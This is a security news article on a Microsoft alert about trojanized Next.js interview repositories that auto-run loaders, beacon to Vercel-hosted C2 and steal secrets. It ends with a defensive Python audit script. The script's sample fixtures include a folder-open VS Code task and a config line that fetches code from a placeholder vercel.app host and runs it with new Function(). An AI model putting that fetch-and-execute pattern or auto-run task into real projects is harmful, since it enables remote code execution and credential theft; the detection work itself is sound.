Microsoft Alerts Developers of Malicious Next.js Repositories Used in Ongoing Hacker Attacks


GBHackers On Security, Feb 25, 2026

Why It Matters

The abuse turns everyday coding tasks into a supply‑chain risk, enabling remote code execution and credential theft at scale. Protecting developer environments is now essential to prevent broader enterprise breaches.

Key Takeaways

  • Next.js repos used as fake interview assessments
  • VS Code tasks auto‑run malicious loader on folder open
  • Node.js processes beacon to Vercel C2 via port 3000
  • Attackers exfiltrate env variables, cloud keys, API tokens
  • Enable VS Code workspace trust and restrict unknown tasks

Pulse Analysis

The latest Microsoft alert shines a light on a sophisticated threat actor group that disguises malicious code as ordinary Next.js starter projects. By embedding payloads in files such as .vscode/tasks.json, next.config.js, and even trojanized jquery.min.js, the attackers trigger execution during workspace opening, npm dev runs, or server startup. Once a developer runs the code, a lightweight Stage 1 script contacts a Vercel‑hosted endpoint, registers the host, and pulls additional JavaScript that runs entirely in memory, bypassing traditional file‑based detection.

This campaign exploits the trust developers place in open‑source repositories and automated tooling. The use of recruiting‑themed assessments blends seamlessly into hiring pipelines, making it difficult for teams to distinguish benign code from malicious code. The resulting command‑and‑control loop not only provides remote code execution but also harvests sensitive environment variables, exposing cloud credentials, database passwords, and API tokens. Such supply‑chain compromises can cascade across development, testing, and production environments, amplifying the potential impact beyond a single workstation.

Microsoft recommends a multi‑layered defense: enable Visual Studio Code’s Workspace Trust and Restricted Mode, scrutinize automation files before granting execution rights, and apply Attack Surface Reduction rules on Windows endpoints. Security teams should deploy advanced hunting queries targeting Node.js outbound traffic to Vercel domains and anomalous eval or new Function usage. Integrating these detections into Sentinel or other SIEM platforms ensures rapid identification of malicious repository activity, helping organizations safeguard their developer ecosystem and prevent credential leakage at the source.
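One way to put the "scrutinize automation files before granting execution rights" advice into practice, as an added example that is not from Microsoft's advisory or this article: a Python audit that flags VS Code tasks configured to run on folder open (the runOptions.runOn "folderOpen" setting) and Next.js config files that fetch code from a Vercel host and execute it with eval or new Function. The sample tasks.json and next.config.js are constructed, and the suspicious-host list is an assumption drawn from the article's mention of Vercel-hosted C2.

```python
"""Pre-open audit for the trigger the article describes: an auto-run VS Code task and a config that executes fetched code."""
import json
import re

SUSPICIOUS_HOSTS = ("vercel.app",)  # assumption based on the article's Vercel-hosted C2
DYNAMIC_EVAL = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")
REMOTE_FETCH = re.compile(r"""\b(fetch|axios\.get|https?\.get)\s*\(\s*["'](https?://[^"']+)""")


def _strip_jsonc(text):
    """tasks.json is JSONC: drop /* */ blocks, whole-line // comments and trailing commas (a '/*' inside a string would be mishandled)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)


def audit_tasks_json(text):
    """Return a finding for every task configured to run automatically on folder open."""
    findings = []
    for task in json.loads(_strip_jsonc(text)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            cmd = " ".join([task.get("command", ""), *task.get("args", [])]).strip()
            findings.append(f"folderOpen task '{task.get('label', '?')}' runs: {cmd}")
    return findings


def audit_source(path, text):
    """Flag dynamic code execution and hard-coded requests to suspicious hosts."""
    findings = []
    if DYNAMIC_EVAL.search(text):
        findings.append(f"{path}: eval()/new Function() present")
    for m in REMOTE_FETCH.finditer(text):
        host = m.group(2).split("/")[2]
        if any(host == h or host.endswith("." + h) for h in SUSPICIOUS_HOSTS):
            findings.append(f"{path}: outbound request to {m.group(2)}")
    return findings


# Constructed sample files modelled on the pattern in the text; not from any real repository.
SAMPLE_TASKS = """{
  // "dev" starts automatically when the folder is opened
  "version": "2.0.0",
  "tasks": [{ "label": "dev", "type": "shell", "command": "node",
              "args": [".vscode/setup.js"], "runOptions": { "runOn": "folderOpen" }, }]
}"""
SAMPLE_CONFIG = """fetch("https://placeholder-project.vercel.app/api/register")
  .then(r => r.text()).then(code => new Function(code)());
module.exports = { reactStrictMode: true };"""

if __name__ == "__main__":
    for f in audit_tasks_json(SAMPLE_TASKS) + audit_source("next.config.js", SAMPLE_CONFIG):
        print("[!]", f)
```

Run it against a freshly cloned repository before opening the folder in VS Code; any finding is a reason to keep the workspace in Restricted Mode until the files have been read.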

